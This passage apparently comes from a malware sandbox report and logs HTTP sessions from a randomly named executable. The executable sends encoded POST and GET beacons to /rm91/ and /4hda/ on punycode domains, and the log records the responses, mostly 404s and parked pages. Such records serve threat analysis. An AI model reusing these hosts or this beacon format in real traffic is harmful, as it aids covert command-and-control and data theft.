                      Jul 2, 2024 07:16:24.389705896 CEST412INData Raw: 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 34 30 70 78 3b 0a 7d 0a 0a 2e 77 72 61 70 70 65 72 33 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 0a 20 20 20 20 6d 61 78
                      Data Ascii: nter bottom; padding-bottom:140px;}.wrapper3 { background:#fff; max-width:300px; margin:0 auto 1rem; padding-top:1px; padding-bottom:1px;}.onDesktop { display:none;}.tcHolder { padding-top: 2rem;}.ad
                      Jul 2, 2024 07:16:24.389719963 CEST1236INData Raw: 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 34 34 30 70 78 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 61 3a 6c 69 6e 6b 2c 0a 2e 66 6f 6f 74 65 72 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 7d 0a 0a
                      Data Ascii: max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%;
                      Jul 2, 2024 07:16:24.389729977 CEST224INData Raw: 31 38 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 0a 2e 66 61 6c 6c 62 61 63 6b
                      Data Ascii: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyB
                      Jul 2, 2024 07:16:24.392970085 CEST1236INData Raw: 7a 64 48 6c 73 5a 54 30 69 5a 6d 78 76 59 58 51 36 49 48 4a 70 5a 32 68 30 49 69 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 47 68 6c 61 57 64 6f 64
                      Data Ascii: zdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMT
                      Jul 2, 2024 07:16:24.393066883 CEST1236INData Raw: 5f 5f 2f 64 65 73 69 67 6e 2f 75 6e 64 65 72 63 6f 6e 73 74 72 75 63 74 69 6f 6e 6e 6f 74 69 63 65 2e 70 68 70 3f 64 3d 62 66 69 77 6f 72 6b 65 72 73 63 6f 6d 70 2e 63 6f 6d 22 3e 57 68 79 20 61 6d 20 49 20 73 65 65 69 6e 67 20 74 68 69 73 20 27
                      Data Ascii: __/design/underconstructionnotice.php?d=bfiworkerscomp.com">Why am I seeing this 'Under Construction' page?</a> </span> </div></div> <div class="tcHolder"> <div id="tc"></div> </
                      Jul 2, 2024 07:16:24.393078089 CEST448INData Raw: 20 20 20 20 20 27 63 6f 6c 6f 72 42 61 63 6b 67 72 6f 75 6e 64 27 3a 20 27 74 72 61 6e 73 70 61 72 65 6e 74 27 2c 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 27 6e 75 6d 62 65 72 27 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20
                      Data Ascii: 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colo
                      Jul 2, 2024 07:16:24.394567966 CEST1236INData Raw: 20 20 20 20 20 27 76 65 72 74 69 63 61 6c 53 70 61 63 69 6e 67 27 3a 20 31 30 0a 20 20 20 20 7d 3b 0a 20 20 20 20 76 61 72 20 73 65 61 72 63 68 62 6f 78 42 6c 6f 63 6b 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20
                      Data Ascii: 'verticalSpacing': 10 }; var searchboxBlock = { 'container': 'search', 'type': 'searchbox', 'fontSizeSearchInput': 12, 'hideSearchInputBorder': false, 'hideSearchButtonBorder': true,
                      Jul 2, 2024 07:16:24.394680977 CEST1236INData Raw: 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 2b 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 28 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3f 20
                      Data Ascii: location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') + '_xafvr=MThhMTE3NjJiNzFlMmU5YTUxMmFjODRkYjBiZDU4MmIxMWMxYzA5MCw2NjgzOGQyODQ1OTQ3'; }var pageLoadedCallbackTriggered = false;var fa
                      Jul 2, 2024 07:16:24.394821882 CEST448INData Raw: 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 2c 61 64 73 4c 6f 61 64 65 64 3a 20 61 64 73 4c 6f 61 64 65 64 2c 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 3a 20 69 73 45 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 2c 63 61 6c 6c 62 61
                      Data Ascii: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOptions,terms: pageOptions.terms};ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&d


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.54972543.252.167.188806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:38.017252922 CEST799OUTPOST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 69 39 46 47 38 58 34 4a 69 67 54 62 43 38 73 50 6d 30 36 66 41 71 53 74 47 6b 6e 58 73 6b 6c 4f 44 55 4f 53 33 73 3d
                      Data Ascii: 66s0QHx=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPi9FG8X4JigTbC8sPm06fAqStGknXsklODUOS3s=
                      Jul 2, 2024 07:16:38.880425930 CEST367INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:14 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.54972643.252.167.188806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:40.545082092 CEST819OUTPOST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 47 71 39 56 73 51 47 63 46 4d 55 67 45 2b 4d 67 35 4b 31 79 63 7a 78 75 75 7a 69 37 44 33 66 6f 50 51 79 2b 39 32
                      Data Ascii: 66s0QHx=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgGq9VsQGcFMUgE+Mg5K1yczxuuzi7D3foPQy+92
                      Jul 2, 2024 07:16:41.402642012 CEST367INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:17 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.54972743.252.167.188806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:43.079508066 CEST1836OUTPOST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 34 57 66 77 41 41 41 6c 30 61 52 6d 65 51 38 30 6f 4d 53 73 4a 37 62 43 38 64 44 67 55 72 38 41 73 58 78 4f 57 46 32 4a 53 37 4f 39 66 66 39 34 41 56 65 54 7a 71 45 43 6a 62 70 6c 4a 68 43 5a 6e 49 2b 2b 72 59 6d 38 77 35 52 48 31 63 4f 30 38 63 77 34 6b 7a 62 4d 37 51 72 2f 73 4a 36 6b 72 4e 30 48 4a 50 68 57 70 5a 43 2b 70 37 35 53 74 4f 62 59 50 43 35 48 59 45 32 39 41 53 47 66 74 70 39 44 4a 4e 64 72 45 43 35 53 55 38 63 61 31 58 7a 43 56 4d 36 34 4b 50 49 35 58 58 49 54 [TRUNCATED]
                      Data Ascii: 66s0QHx=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC4WfwAAAl0aRmeQ80oMSsJ7bC8dDgUr8AsXxOWF2JS7O9ff94AVeTzqECjbplJhCZnI++rYm8w5RH1cO08cw4kzbM7Qr/sJ6krN0HJPhWpZC+p75StObYPC5HYE29ASGftp9DJNdrEC5SU8ca1XzCVM64KPI5XXITbt0adutcL679ckeRtG8MqNkMJ51B+GnO4W1VmiKT/QsttfoHNSTFnXp6qREOT4Nh3Dfd2UQnn5uD/J6yzt3af2OHcCjK5mgwjHCIi3hLxmE2jVfaTI3Yrz4v5YWh1u6JnSqC19+iaQoxZYvcffsyOTpy5ZY2XjIXtSa1cVOrB9K2iypg081mRxBh5m3jaG6ncHAG+f5/JSw6cJ8Whx/6A1DrO4agA79H0UhRuG6+XDEfgZNLeWTPDAQdwxjE6Cfzd71PQC0coVduQwncFCxl6lNFj0DMgK+iyk+xHL908f43fGVdQVv9BkiTBC4GXSeEAipUHT2x96V21QNJIa+j1xNtLcQlPRhl/EZRF6TzabmEMmguQiLkRzmGaXz5bFDqbpMLInR0MMyjSRxBwXRDeofsmQbPqB6+FXjXElspSKl0tiYKbdtfevMOq+YwzC9a0In5CSvb2jY/SGAAesyBIdT0HET3yOEr7M5wDOUtkYpib2VK1D1thi37x42X+eDJB4iOb1hiC/11yxyAZ9V3OWFUjkAdPXXmLzWB96FtOoEQjGRZ7i3BBWx1ztI069TqHhLFYmfkEQez1Fd533Ng+7HqOyKGoiWK+NfMfFECTvHkzZZzbvHbq5WxPmmUlbkpcAKuMrHV4jDFrE51wfTqSQhVZGtL0bpSfl [TRUNCATED]
                      Jul 2, 2024 07:16:44.148407936 CEST367INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:19 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.54972843.252.167.188806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:45.611141920 CEST530OUTGET /rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.xn--fhq1c541j0zr.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:46.464256048 CEST367INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:22 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.549729194.9.94.85806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:16:51.569314957 CEST799OUTPOST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 2f 65 31 61 73 5a 6a 63 64 32 67 50 36 42 6b 6d 4c 77 6e 73 41 75 31 32 54 36 52 35 53 45 48 62 47 73 48 63 45 6f 3d
                      Data Ascii: 66s0QHx=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2X/e1asZjcd2gP6BkmLwnsAu12T6R5SEHbGsHcEo=
                      Jul 2, 2024 07:16:52.215253115 CEST1236INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:52.215310097 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                      Jul 2, 2024 07:16:52.215320110 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                      Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
